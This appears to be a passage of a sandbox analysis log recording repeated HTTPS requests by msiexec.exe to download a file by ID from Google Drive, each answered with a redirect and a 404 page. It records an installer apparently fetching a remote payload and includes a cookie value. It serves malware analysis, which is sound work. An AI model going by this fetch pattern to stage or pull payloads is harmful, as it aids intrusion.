                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:38 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:37 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-4kBliDViLGmatds8AIoH1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.849750172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:38 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:39 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSBrkuQsPgmMEskLxGC8hVJpfkBFz_TA9Kd-xz1ltYF9nPDo0zqAibtQJgWLo7WIU7T
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:38 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-IglOiNTc-nCREr1D1YXe2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 4e 76 70 68 4b 70 75 76 71 55 5a 62 35 41 6b 48 55 51 79 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LNvphKpuvqUZb5AkHUQygw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.849751216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:39 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:40 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:40 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-D2yPVh-2J5-N9xktrRNqpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.849752172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:40 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:41 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRIsS3_VR1zqWgNr05Qpyb2NV_oR098XDlKKkRQR6x8doYWwv4L_9IT-MFIRtJewoQlolLcUyg
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:41 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-ado2d8D14lTUJJHIjNGIug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 66 53 43 45 4b 69 61 4f 71 68 72 31 33 51 7a 7a 4b 6e 4f 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WfSCEKiaOqhr13QzzKnOgw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.849753216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:42 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:42 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:42 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-lUeTrsJ0Mno7uh2hcEqE-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.849754172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:43 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:43 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQddutKmDAyiLh6KjyyQXHoFCujtkvNkLpzhF62EnYvRaNnqF9LMzc9hGvxmnzlqDRz
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:43 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-sMlgXdLfw758_kVJkUeB8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 66 6d 41 30 4b 7a 6a 53 7a 44 59 64 2d 67 42 42 4a 44 41 47 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7fmA0KzjSzDYd-gBBJDAGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.849755216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:44 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:44 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:44 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-IuhpLxp92NrI4fSEoYDr2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.849756172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:45 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:45 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6lvTj79Wqf7IQPqXc9LIhDplZxpFurjOCd4i9NkftsKE5fNccmDa6P7uWXRY6wEZGj
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:45 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-ofVOmCbap95lBIkTCA-a0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
